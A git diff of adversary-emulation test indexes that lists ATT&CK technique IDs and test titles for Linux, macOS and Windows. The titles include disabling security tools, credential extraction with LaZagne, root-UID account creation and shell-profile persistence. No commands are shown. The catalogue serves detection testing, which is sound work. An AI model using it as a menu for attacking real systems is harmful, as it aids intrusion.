Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash +privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh @@ -74,6 +59,8 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh +defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh @@ -85,8 +72,6 @@ defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh -defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -defense-evasion,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash @@ -155,6 +140,26 @@ discovery,T1082,System Information Discovery,11,Environment variables discovery discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh +persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual +persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual +persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash +persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash +persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash +persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash +persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash +persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash +persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash +persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash @@ -166,6 +171,9 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh +execution,T1609,Container Administration Command,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash +execution,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash +execution,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 0aab232a..987cd38e 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -1,46 +1,4 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh -privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh -privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh -privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh -privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh -privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh -persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual -persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual -persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual -persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual -persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash -persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual -persistence,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash -persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual -persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh -persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash -persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh -persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh @@ -59,6 +17,27 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password, collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash +privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh @@ -143,6 +122,27 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh +persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual +persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual +persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual +persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual +persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash +persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash +persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash +persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash +persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual +persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual +persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual +persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh +persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash +persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh +persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh +persistence,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d9ef501a..766fe117 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -371,6 +371,7 @@ persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d- persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt +persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c6241700..96704302 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1,391 +1,4 @@ # All Atomic Tests by ATT&CK Tactic & Technique -# privilege-escalation -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - - Atomic Test #2: Replace binary of sticky keys [windows] -- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - - Atomic Test #1: Install AppInit Shim [windows] -- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) - - Atomic Test #1: Application Shim Installation [windows] - - Atomic Test #2: New shim database files created in the default shim database directory [windows] - - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] -- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md) - - Atomic Test #1: Process Injection via C# [windows] -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) - - Atomic Test #1: At.exe Scheduled task [windows] -- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] - - Atomic Test #3: Bypass UAC using Fodhelper [windows] - - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] - - Atomic Test #8: Disable UAC using reg.exe [windows] -- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - - Atomic Test #1: User scope COR_PROFILER [windows] - - Atomic Test #2: System Scope COR_PROFILER [windows] - - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] -- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - - Atomic Test #1: Change Default File Association [windows] -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] -- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] -- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - - Atomic Test #1: Process Injection via mavinject.exe [windows] -- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) - - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO Global Flags [windows] 